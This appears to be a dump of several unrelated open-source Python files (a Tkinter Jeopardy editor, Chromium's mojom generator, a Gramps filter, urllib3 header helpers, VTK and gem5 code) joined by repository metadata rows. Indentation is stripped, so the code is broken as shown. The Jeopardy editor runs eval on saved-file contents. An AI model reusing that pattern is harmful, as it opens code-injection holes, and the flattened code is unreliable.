exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.columnconfigure('+str(x)+',weight=1)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.rowconfigure('+str(x)+',weight=1)')
exec('self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.rowconfigure(2,weight=1)')
##################################
self.clusterfuck = {}
self.clusterfuck = eval(str(self.sepf[2]))
self.R3.category = Tkinter.StringVar()
self.R3.category.set(self.clusterfuck[0])
self.R3.categoryentry = Tkinter.Entry(self.R3,textvariable=self.R3.category,font=self.Font)
self.R3.categoryentry.grid(column=0,columnspan=3,row=0,sticky="NSEW")
for i,name in enumerate(["question","answer"]):
exec('self.R3.'+name+' = Tkinter.StringVar()')
exec('self.R3.'+name+'.set(self.clusterfuck['+str(i+1)+'])')
exec('self.R3.'+name+'entry = Tkinter.Entry(self.R3,textvariable=self.R3.'+name+',font=self.Font)')
exec('self.R3.'+name+'entry.grid(column='+str(i)+',row=1,sticky="NSEW")')
self.R3.pointsentry = Tkinter.Label(self.R3,text="Final Jeopardy",font=self.Font)
self.R3.pointsentry.grid(column=2,row=1,sticky="NSEW")
self.R3.imagefile = Tkinter.StringVar()
self.R3.imagecheck=Tkinter.Button(self.R3,text="Add image",command=self.changerelief,font=self.Font)
if self.clusterfuck[3]:
self.R3.imagecheck.config(relief="sunken")
self.R3.imagefile.set(str(self.clusterfuck[3]))
self.R3.imagecheck.grid(row=2,column=2,sticky="NSEW")
for x in range(0,2):
exec('self.R3.columnconfigure('+str(x)+',weight=1)')
exec('self.R3.rowconfigure('+str(x)+',weight=1)')
self.R3.rowconfigure(2,weight=1)
self.Round = 1
self.clusterfuck = eval(str(self.sepf[0]))
self.P=eval(str(self.clusterfuck[1]))
self.roundload()
f.close()
def roundload(self):
exec('self.R'+str(self.Round)+'.grid(column=0,row=0,sticky="NSEW")')
def RawSave(self):
if self.SaveFile:
self.fileName = self.SaveFile.replace(self.HOME+"/.PythonJeopardy/","")
self.fileName = self.fileName.replace(".board","")
self.ent.set(self.fileName)
self.extension = ".board"
self.newSaveName()
def ReadSave(self):
if self.SaveFile:
self.fileName = self.SaveFile.replace(self.HOME+"/.PythonJeopardy/","")
self.fileName = self.fileName.replace(".txt","")
self.ent.set(self.fileName)
self.extension = ".txt"
self.newSaveName()
def newSaveName(self):
self.typebox = Tkinter.Toplevel(self)
self.typebox.label = Tkinter.Label(self.typebox,text="Save file at: %s/.PythonJeopardy/" % self.HOME,font=self.Font)
self.typebox.label.grid(row=0,column=0,sticky="NSEW")
self.typebox.entry = Tkinter.Entry(self.typebox,textvariable=self.ent)
self.typebox.entry.grid(row=0,column=1,sticky="NSEW")
self.typebox.labelEx = Tkinter.Label(self.typebox,text="%s" % self.extension)
self.typebox.labelEx.grid(row=0,column=2,sticky="NSEW")
self.typebox.button = Tkinter.Button(self.typebox,text="Save",command=self.preSave)
self.typebox.button.grid(row=0,column=3,sticky="NSEW")
self.typebox.update()
self.typebox.geometry(self.typebox.geometry())
def preSave(self):
self.fileName = self.ent.get() + self.extension
self.startSave()
def startSave(self):
self.SaveFile = self.HOME + "/.PythonJeopardy/" + self.fileName
self.arraysave()
try:
self.typebox.destroy()
except:
annoying = True
def arraysave(self):
f=open(self.SaveFile,'w')
if self.fileName == self.fileName.replace(".txt",""):
for Round in [1,2]:
ABP=[]
for cat in range(0,5):
for ques in range(1,6):
exec('q=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.question.get()')
q=q.replace('"','\"')
q=q.replace("'","\'")
exec('a=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.answer.get()')
a=a.replace('"','\"')
a=a.replace("'","\'")
exec('if self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get():'+
'\n if self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get() != "Type full path to image here":'
'\n i=self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get()'
'\n else:'+
'\n i=""'+
'\nelse:'+
'\n i=""')
i=i.replace('"','\"')
i=i.replace("'","\'")
exec('B'+str(ques)+'=[q,a,i]')
exec('C'+str(cat)+'=[B1,B2,B3,B4,B5]')
exec('ABP.append([self.R'+str(Round)+'.cat'+str(cat)+'.get(),C'+str(cat)+'])')
Pn=[]
for i,item in enumerate(self.P):
Pn.append(item*Round)
board = [ABP,Pn]
f.write(str(board)+'\n')
c=self.R3.category.get()
c=c.replace('"','\"')
c=c.replace("'","\'")
q=self.R3.question.get()
q=q.replace('"','\"')
q=q.replace("'","\'")
a=self.R3.answer.get()
a=a.replace('"','\"')
a=a.replace("'","\'")
i=self.R3.imagefile.get()
i=i.replace('"','\"')
i=i.replace("'","\'")
ABP=[c,q,a,i]
f.write(str(ABP))
else:
################### I spent entirely too much time making this.
f.writelines( " ____ __ __ ______ __ __ ____ __ __"+"\n"+
" / O |\ \/ //_ __// /_/ // __ | / \/ /"+"\n"+
" / ___/ _\ / / / / __ // /_/ // /\ /"+"\n"+
" /_/ /___/ /_/ /_/ /_/ |____//_/ /_/"+"\n"+
" ________ ______ ____ _____ ___ _____ _____ __ ___"+"\n"+
" /__ __// ___// _ \ / __ \ / | / __ \ / __ \ \ \ / /"+"\n"+
" / / / /__ / / | | / /_/ |/ o | / /_/ | / / | | \ \/ /"+"\n"+
" __ / / / ___// / / / / ____// _ | / _ / / / / /_ \ /"+"\n"+
" / /_/ / / /__ | |_/ / / / / / | | / / | | / /__/ /| |_/ /"+"\n"+
" \_____/ /_____/ \____/ /__/ /__/ |_|/__/ |_|/_______/ \____/"+"\n\n\n")
for Round in [1,2,3]:
if Round <3:
f.writelines(" X><><><><><><><><X\n X Round #%s X\n X><><><><><><><><X\n\n" % Round)
for cat in range(0,5):
exec('f.writelines("Category: "+self.R'+str(Round)+'.cat'+str(cat)+'.get()+"\\n")')
for ques in range(1,6):
exec('f.writelines(str(self.P['+str(ques-1)+']*'+str(Round)+')+": "+self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.question.get()+"\\n")')
exec('f.writelines(" Answer: "+self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.answer.get()+"\\n")')
exec('if self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get():'+
'\n if self.ed'+str(cat)+'x'+str(ques)+'R'+str(self.Round)+'.imagefile.get() != "Type full path to image here":'
'\n f.writelines(" Image: "+self.ed'+str(cat)+'x'+str(ques)+'R'+str(Round)+'.imagefile.get()+"\\n")')
f.writelines("\n")
else:
f.writelines(" X><><><><><><><><X\n X FINAL JEOPARDY X\n X><><><><><><><><X\n\nCategory: %s\n Question: %s\n Answer: %s" % (self.R3.category.get(),self.R3.question.get(),self.R3.answer.get()))
if self.R3.imagefile.get():
if self.R3.imagefile.get() != "Type full path to image here":
f.writelines("\n Image: %s" % self.R3.imagefile.get())
f.close()
def pointass(self):
self.pointbox = Tkinter.Toplevel(self)
self.pointbox.wm_title("Enter point values")
self.pointbox.menya = Tkinter.Menu(self.pointbox)
self.pointbox.menya.add_command(label="Update Points", command=self.pointsave)
self.pointbox.menya.add_command(label="Close", command=self.annoying)
self.pointbox.config(menu=self.pointbox.menya)
for i in range(0,5):
exec('self.pointbox.points'+str(i)+'=Tkinter.IntVar()')
exec('self.pointbox.points'+str(i)+'entry=Tkinter.Entry(self.pointbox,textvariable=self.pointbox.points'+str(i)+')')
exec('self.pointbox.points'+str(i)+'entry.grid(column=0,row='+str(i)+',sticky="NSEW")')
def annoying(self):
self.pointbox.destroy()
def pointsave(self):
for i in range(1,6):
for j in range(0,5):
exec('self.P['+str(j)+']=int(self.pointbox.points'+str(j)+'entry.get())')
exec('self.R'+str(self.Round)+'.box'+str(j)+'x'+str(i)+'.config(text=eval(str(self.P['+str(i-1)+']*'+str(self.Round)+')))')
for Round in [1,2]:
exec('def loadround'+str(Round)+'(self):'+
'\n exec("self.R"+str(self.Round)+".grid_remove()")'+
'\n self.clusterfuck = eval(str(self.sepf['+str(Round-1)+']))'+
'\n self.P=eval(str(self.clusterfuck[1]))'+
'\n self.Round = '+str(Round)+
'\n self.roundload()')
def loadround3(self):
exec("self.R"+str(self.Round)+".grid_remove()")
self.clusterfuck = eval(str(self.sepf[2]))
self.Round = 3
self.roundload()
def fontadj(self):
ws=self.winfo_width()
self.Font.config(size=int(math.ceil(ws/60)))
if self.Round <3:
for cat in range(0,5):
for ques in range(1,6):
exec('self.R'+str(self.Round)+'.box'+str(cat)+'x'+str(ques)+'.config(wraplength='+str(int(math.ceil(ws/5)))+')')
exec('self.R'+str(self.Round)+'.catlab'+str(cat)+'.config(width='+str(int(math.ceil(ws/5)))+')')
for cat in range(0,5):
for ques in range(1,6):
exec('def reveal'+str(cat)+'x'+str(ques)+'(self):'+
'\n self.CAT='+str(cat)+
'\n self.QUES='+str(ques)+
'\n self.PTS=self.P['+str(ques-1)+']'+
'\n self.reveal()')
def reveal(self):
exec('self.R'+str(self.Round)+'.grid_remove()')
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.pointsentry = Tkinter.Label(self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+',text=eval(str(self.P['+str(self.QUES-1)+'])),font=self.Font)')
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.pointsentry.grid(column=2,row=0,sticky="NSEW")')
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.grid(row=0,column=0,sticky="NSEW")')
def changerelief(self):
if self.Round<3:
exec('FRAME = "self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'"')
else:
FRAME = "self.R3"
if eval(FRAME+'.imagecheck.config("relief")[-1]') == "raised":
exec(FRAME+'.imagecheck.config(relief="sunken",text="Remove image")')
exec('if not str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(self.CAT)+']))[1]))['+str(self.QUES-1)+']))[2]):'+
'\n '+FRAME+'.imagefile.set("Type full path to image here")'+
'\nelse:'+
'\n '+FRAME+'.imagefile.set(str(eval(str(eval(str(eval(str(eval(str(self.clusterfuck[0]))['+str(self.CAT)+']))[1]))['+str(self.QUES-1)+']))[2]))')
exec(FRAME+'.imageentry = Tkinter.Entry('+FRAME+',textvariable='+FRAME+'.imagefile,font=self.Font)')
if self.Round<3:
exec(FRAME+'.imageentry.grid(row=1,column=0,columnspan=2,sticky="NSEW")')
else:
exec(FRAME+'.imageentry.grid(row=2,column=0,columnspan=2,sticky="NSEW")')
else:
exec(FRAME+'.imagecheck.config(relief="raised",text="Add image")')
exec(FRAME+'.imageentry.grid_remove()')
exec(FRAME+'.imagefile.set("")')
def returntoboard(self):
exec('self.ed'+str(self.CAT)+'x'+str(self.QUES)+'R'+str(self.Round)+'.grid_remove()')
exec('self.R'+str(self.Round)+'.grid(column=0,row=0,sticky="NSEW")')
def StartAnew(self):
self.OpenFile = self.HOME+"/.PythonJeopardy/Default"
self.fileName=""
self.SaveFile = ""
self.arrayload()
if __name__ == "__main__":
app = simpleapp_tk(None)
app.title('Jeopardy Editor')
app.mainloop()
| mit | 722,170,261,903,929,300 | 46.793451 | 229 | 0.591125 | false |
ltilve/ChromiumGStreamerBackend | third_party/mojo/src/mojo/public/tools/bindings/mojom_bindings_generator.py | 3 | 8427 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The frontend for the Mojo bindings system."""
import argparse
import imp
import os
import pprint
import sys
# Disable lint check for finding modules:
# pylint: disable=F0401
def _GetDirAbove(dirname):
"""Returns the directory "above" this file containing |dirname| (which must
also be "above" this file)."""
path = os.path.abspath(__file__)
while True:
path, tail = os.path.split(path)
assert tail
if tail == dirname:
return path
# Manually check for the command-line flag. (This isn't quite right, since it
# ignores, e.g., "--", but it's close enough.)
if "--use_bundled_pylibs" in sys.argv[1:]:
sys.path.insert(0, os.path.join(_GetDirAbove("public"), "public/third_party"))
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)),
"pylib"))
from mojom.error import Error
import mojom.fileutil as fileutil
from mojom.generate.data import OrderedModuleFromData
from mojom.parse.parser import Parse
from mojom.parse.translate import Translate
def LoadGenerators(generators_string):
if not generators_string:
return [] # No generators.
script_dir = os.path.dirname(os.path.abspath(__file__))
generators = []
for generator_name in [s.strip() for s in generators_string.split(",")]:
# "Built-in" generators:
if generator_name.lower() == "c++":
generator_name = os.path.join(script_dir, "generators",
"mojom_cpp_generator.py")
elif generator_name.lower() == "dart":
generator_name = os.path.join(script_dir, "generators",
"mojom_dart_generator.py")
elif generator_name.lower() == "go":
generator_name = os.path.join(script_dir, "generators",
"mojom_go_generator.py")
elif generator_name.lower() == "javascript":
generator_name = os.path.join(script_dir, "generators",
"mojom_js_generator.py")
elif generator_name.lower() == "java":
generator_name = os.path.join(script_dir, "generators",
"mojom_java_generator.py")
elif generator_name.lower() == "python":
generator_name = os.path.join(script_dir, "generators",
"mojom_python_generator.py")
# Specified generator python module:
elif generator_name.endswith(".py"):
pass
else:
print "Unknown generator name %s" % generator_name
sys.exit(1)
generator_module = imp.load_source(os.path.basename(generator_name)[:-3],
generator_name)
generators.append(generator_module)
return generators
def MakeImportStackMessage(imported_filename_stack):
"""Make a (human-readable) message listing a chain of imports. (Returned
string begins with a newline (if nonempty) and does not end with one.)"""
return ''.join(
reversed(["\n %s was imported by %s" % (a, b) for (a, b) in \
zip(imported_filename_stack[1:], imported_filename_stack)]))
def FindImportFile(dir_name, file_name, search_dirs):
for search_dir in [dir_name] + search_dirs:
path = os.path.join(search_dir, file_name)
if os.path.isfile(path):
return path
return os.path.join(dir_name, file_name)
class MojomProcessor(object):
def __init__(self, should_generate):
self._should_generate = should_generate
self._processed_files = {}
self._parsed_files = {}
def ProcessFile(self, args, remaining_args, generator_modules, filename):
self._ParseFileAndImports(filename, args.import_directories, [])
return self._GenerateModule(args, remaining_args, generator_modules,
filename)
def _GenerateModule(self, args, remaining_args, generator_modules, filename):
# Return the already-generated module.
if filename in self._processed_files:
return self._processed_files[filename]
tree = self._parsed_files[filename]
dirname, name = os.path.split(filename)
mojom = Translate(tree, name)
if args.debug_print_intermediate:
pprint.PrettyPrinter().pprint(mojom)
# Process all our imports first and collect the module object for each.
# We use these to generate proper type info.
for import_data in mojom['imports']:
import_filename = FindImportFile(dirname,
import_data['filename'],
args.import_directories)
import_data['module'] = self._GenerateModule(
args, remaining_args, generator_modules, import_filename)
module = OrderedModuleFromData(mojom)
# Set the path as relative to the source root.
module.path = os.path.relpath(os.path.abspath(filename),
os.path.abspath(args.depth))
# Normalize to unix-style path here to keep the generators simpler.
module.path = module.path.replace('\\', '/')
if self._should_generate(filename):
for generator_module in generator_modules:
generator = generator_module.Generator(module, args.output_dir)
filtered_args = []
if hasattr(generator_module, 'GENERATOR_PREFIX'):
prefix = '--' + generator_module.GENERATOR_PREFIX + '_'
filtered_args = [arg for arg in remaining_args
if arg.startswith(prefix)]
generator.GenerateFiles(filtered_args)
# Save result.
self._processed_files[filename] = module
return module
def _ParseFileAndImports(self, filename, import_directories,
imported_filename_stack):
# Ignore already-parsed files.
if filename in self._parsed_files:
return
if filename in imported_filename_stack:
print "%s: Error: Circular dependency" % filename + \
MakeImportStackMessage(imported_filename_stack + [filename])
sys.exit(1)
try:
with open(filename) as f:
source = f.read()
except IOError as e:
print "%s: Error: %s" % (e.filename, e.strerror) + \
MakeImportStackMessage(imported_filename_stack + [filename])
sys.exit(1)
try:
tree = Parse(source, filename)
except Error as e:
full_stack = imported_filename_stack + [filename]
print str(e) + MakeImportStackMessage(full_stack)
sys.exit(1)
dirname = os.path.split(filename)[0]
for imp_entry in tree.import_list:
import_filename = FindImportFile(dirname,
imp_entry.import_filename, import_directories)
self._ParseFileAndImports(import_filename, import_directories,
imported_filename_stack + [filename])
self._parsed_files[filename] = tree
def main():
parser = argparse.ArgumentParser(
description="Generate bindings from mojom files.")
parser.add_argument("filename", nargs="+",
help="mojom input file")
parser.add_argument("-d", "--depth", dest="depth", default=".",
help="depth from source root")
parser.add_argument("-o", "--output_dir", dest="output_dir", default=".",
help="output directory for generated files")
parser.add_argument("-g", "--generators", dest="generators_string",
metavar="GENERATORS",
default="c++,go,javascript,java,python",
help="comma-separated list of generators")
parser.add_argument("--debug_print_intermediate", action="store_true",
help="print the intermediate representation")
parser.add_argument("-I", dest="import_directories", action="append",
metavar="directory", default=[],
help="add a directory to be searched for import files")
parser.add_argument("--use_bundled_pylibs", action="store_true",
help="use Python modules bundled in the SDK")
(args, remaining_args) = parser.parse_known_args()
generator_modules = LoadGenerators(args.generators_string)
fileutil.EnsureDirectoryExists(args.output_dir)
processor = MojomProcessor(lambda filename: filename in args.filename)
for filename in args.filename:
processor.ProcessFile(args, remaining_args, generator_modules, filename)
return 0
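# Illustrative invocation (the mojom file, output directory and search path are placeholders):
#   python mojom_bindings_generator.py -d . -o out/gen -g c++,javascript \
#       -I mojo/public sample.mojom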
if __name__ == "__main__":
sys.exit(main())
| bsd-3-clause | 2,191,873,826,871,393,300 | 37.131222 | 80 | 0.638661 | false |
sam-m888/gramps | gramps/gen/filters/rules/family/_regexpfathername.py | 5 | 1856 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# Gramps modules
#
#-------------------------------------------------------------------------
from ..person import RegExpName
from ._memberbase import father_base
#-------------------------------------------------------------------------
#
# RegExpFatherName
#
#-------------------------------------------------------------------------
class RegExpFatherName(RegExpName):
"""Rule that checks for full or partial name matches"""
name = _('Families with father matching the <regex_name>')
description = _("Matches families whose father has a name "
"matching a specified regular expression")
category = _('Father filters')
base_class = RegExpName
apply = father_base
| gpl-2.0 | 8,945,566,058,980,223,000 | 36.12 | 79 | 0.554418 | false |
Shivam-Miglani/AndroidViewClient | examples/monkeyrunner-issue-36544-workaround.py | 9 | 2846 | #! /usr/bin/env python
'''
Copyright (C) 2012 Diego Torres Milano
Created on Sep 8, 2012
@author: diego
@see: http://code.google.com/p/android/issues/detail?id=36544
'''
import re
import sys
import os
# This must be imported before MonkeyRunner and MonkeyDevice,
# otherwise the import fails.
# PyDev sets PYTHONPATH, use it
try:
for p in os.environ['PYTHONPATH'].split(':'):
if not p in sys.path:
sys.path.append(p)
except:
pass
try:
sys.path.append(os.path.join(os.environ['ANDROID_VIEW_CLIENT_HOME'], 'src'))
except:
pass
from com.dtmilano.android.viewclient import ViewClient, View
device, serialno = ViewClient.connectToDeviceOrExit()
FLAG_ACTIVITY_NEW_TASK = 0x10000000
# We are not using Settings as the bug describes because there's no WiFi dialog in emulator
#componentName = 'com.android.settings/.Settings'
componentName = 'com.dtmilano.android.sampleui/.MainActivity'
device.startActivity(component=componentName, flags=FLAG_ACTIVITY_NEW_TASK)
ViewClient.sleep(3)
# Set it to True or False to decide if AndroidViewClient or plain monkeyrunner is used
USE_AVC = True
if USE_AVC:
# AndroidViewClient
vc = ViewClient(device=device, serialno=serialno)
showDialogButton = vc.findViewById('id/show_dialog_button')
if showDialogButton:
showDialogButton.touch()
vc.dump()
vc.findViewById('id/0x123456').type('Donald')
ok = vc.findViewWithText('OK')
if ok:
# 09-08 20:17:47.860: D/MonkeyStub(2033): translateCommand: tap 265 518
ok.touch()
vc.dump()
hello = vc.findViewById('id/hello')
if hello:
if hello.getText() == "Hello Donald":
print "OK"
else:
print "FAIL"
else:
print >> sys.stderr, "'hello' not found"
else:
print >> sys.stderr, "'Show Dialog' button not found"
else:
# MonkeyRunner
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
easyDevice = EasyMonkeyDevice(device)
showDialogButton = By.id('id/show_dialog_button')
if showDialogButton:
easyDevice.touch(showDialogButton, MonkeyDevice.DOWN_AND_UP)
ViewClient.sleep(3)
editText = By.id('id/0x123456')
print editText
easyDevice.type(editText, 'Donald')
ViewClient.sleep(3)
ok = By.id('id/button1')
if ok:
# 09-08 20:16:41.119: D/MonkeyStub(1992): translateCommand: tap 348 268
easyDevice.touch(ok, MonkeyDevice.DOWN_AND_UP)
hello = By.id('id/hello')
if hello:
if easyDevice.getText(hello) == "Hello Donald":
print "OK"
else:
print "FAIL"
else:
print >> sys.stderr, "'hello' not found"
| apache-2.0 | -2,726,321,241,022,355,500 | 29.602151 | 91 | 0.643008 | false |
atramos/facebook-photo-sync | facebook/requests/packages/urllib3/util/request.py | 1008 | 2089 | from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
| gpl-3.0 | -759,284,638,286,438,100 | 28.422535 | 85 | 0.61034 | false |
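# A short usage sketch for the make_headers() helper in the file above (not
# part of the original module).  The credential and agent strings are invented
# placeholders; the resulting dict is what would be passed as extra headers to
# a urllib3 request.
extra_headers = make_headers(
    keep_alive=True,
    accept_encoding=['gzip', 'deflate'],
    user_agent='example-client/0.1',
    basic_auth='user:secret',
    disable_cache=True,
)
# extra_headers now holds 'connection', 'accept-encoding', 'user-agent',
# 'authorization' and 'cache-control' entries, as described in the docstring.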
sankhesh/VTK | Examples/Infovis/Python/tables1.py | 13 | 1485 | #!/usr/bin/env python
"""
This file contains Python code illustrating the creation and manipulation of
vtkTable objects.
"""
from __future__ import print_function
from vtk import *
#------------------------------------------------------------------------------
# Script Entry Point (i.e., main() )
#------------------------------------------------------------------------------
if __name__ == "__main__":
""" Main entry point of this python script """
print("vtkTable Example 1: Building a vtkTable from scratch.")
#----------------------------------------------------------
# Create an empty table
T = vtkTable()
#----------------------------------------------------------
# Create Column 1 (IDs)
col1 = vtkIntArray()
col1.SetName("ID")
for i in range(1, 8):
col1.InsertNextValue(i)
T.AddColumn(col1)
#----------------------------------------------------------
# Create Column 2 (Names)
namesList = ['Bob', 'Ann', 'Sue', 'Bill', 'Joe', 'Jill', 'Rick']
col2 = vtkStringArray()
col2.SetName("Name")
for val in namesList:
col2.InsertNextValue(val)
T.AddColumn(col2)
#----------------------------------------------------------
# Create Column 3 (Ages)
agesList = [12, 25, 72, 11, 31, 36, 32]
col3 = vtkIntArray()
col3.SetName("Age")
for val in agesList:
col3.InsertNextValue(val)
T.AddColumn(col3)
T.Dump(6)
print("vtkTable Example 1: Finished.")
| bsd-3-clause | 4,190,046,905,745,310,000 | 28.7 | 79 | 0.445118 | false |
rjschof/gem5 | src/arch/micro_asm.py | 86 | 14724 | # Copyright (c) 2003-2005 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
import os
import sys
import re
import string
import traceback
# get type names
from types import *
from ply import lex
from ply import yacc
##########################################################################
#
# Base classes for use outside of the assembler
#
##########################################################################
class Micro_Container(object):
def __init__(self, name):
self.microops = []
self.name = name
self.directives = {}
self.micro_classes = {}
self.labels = {}
def add_microop(self, mnemonic, microop):
self.microops.append(microop)
def __str__(self):
string = "%s:\n" % self.name
for microop in self.microops:
string += " %s\n" % microop
return string
class Combinational_Macroop(Micro_Container):
pass
class Rom_Macroop(object):
def __init__(self, name, target):
self.name = name
self.target = target
def __str__(self):
return "%s: %s\n" % (self.name, self.target)
class Rom(Micro_Container):
def __init__(self, name):
super(Rom, self).__init__(name)
self.externs = {}
##########################################################################
#
# Support classes
#
##########################################################################
class Label(object):
def __init__(self):
self.extern = False
self.name = ""
class Block(object):
def __init__(self):
self.statements = []
class Statement(object):
def __init__(self):
self.is_microop = False
self.is_directive = False
self.params = ""
class Microop(Statement):
def __init__(self):
super(Microop, self).__init__()
self.mnemonic = ""
self.labels = []
self.is_microop = True
class Directive(Statement):
def __init__(self):
super(Directive, self).__init__()
self.name = ""
self.is_directive = True
##########################################################################
#
# Functions that handle common tasks
#
##########################################################################
def print_error(message):
print
print "*** %s" % message
print
def handle_statement(parser, container, statement):
if statement.is_microop:
if statement.mnemonic not in parser.microops.keys():
raise Exception, "Unrecognized mnemonic: %s" % statement.mnemonic
parser.symbols["__microopClassFromInsideTheAssembler"] = \
parser.microops[statement.mnemonic]
try:
microop = eval('__microopClassFromInsideTheAssembler(%s)' %
statement.params, {}, parser.symbols)
except:
print_error("Error creating microop object with mnemonic %s." % \
statement.mnemonic)
raise
try:
for label in statement.labels:
container.labels[label.text] = microop
if label.is_extern:
container.externs[label.text] = microop
container.add_microop(statement.mnemonic, microop)
except:
print_error("Error adding microop.")
raise
elif statement.is_directive:
if statement.name not in container.directives.keys():
raise Exception, "Unrecognized directive: %s" % statement.name
parser.symbols["__directiveFunctionFromInsideTheAssembler"] = \
container.directives[statement.name]
try:
eval('__directiveFunctionFromInsideTheAssembler(%s)' %
statement.params, {}, parser.symbols)
except:
print_error("Error executing directive.")
print container.directives
raise
else:
raise Exception, "Didn't recognize the type of statement", statement
##########################################################################
#
# Lexer specification
#
##########################################################################
# Error handler. Just call exit. Output formatted to work under
# Emacs compile-mode. Optional 'print_traceback' arg, if set to True,
# prints a Python stack backtrace too (can be handy when trying to
# debug the parser itself).
def error(lineno, string, print_traceback = False):
# Print a Python stack backtrace if requested.
if (print_traceback):
traceback.print_exc()
if lineno != 0:
line_str = "%d:" % lineno
else:
line_str = ""
sys.exit("%s %s" % (line_str, string))
reserved = ('DEF', 'MACROOP', 'ROM', 'EXTERN')
tokens = reserved + (
# identifier
'ID',
# arguments for microops and directives
'PARAMS',
'LPAREN', 'RPAREN',
'LBRACE', 'RBRACE',
'COLON', 'SEMI', 'DOT',
'NEWLINE'
)
# New lines are ignored at the top level, but they end statements in the
# assembler
states = (
('asm', 'exclusive'),
('params', 'exclusive'),
)
reserved_map = { }
for r in reserved:
reserved_map[r.lower()] = r
# Ignore comments
def t_ANY_COMMENT(t):
r'\#[^\n]*(?=\n)'
def t_ANY_MULTILINECOMMENT(t):
r'/\*([^/]|((?<!\*)/))*\*/'
# A colon marks the end of a label. It should follow an ID which will
# put the lexer in the "params" state. Seeing the colon will put it back
# in the "asm" state since it knows it saw a label and not a mnemonic.
def t_params_COLON(t):
r':'
t.lexer.begin('asm')
return t
# Parameters are a string of text which doesn't contain an unescaped
# statement terminator, i.e. a newline or semicolon.
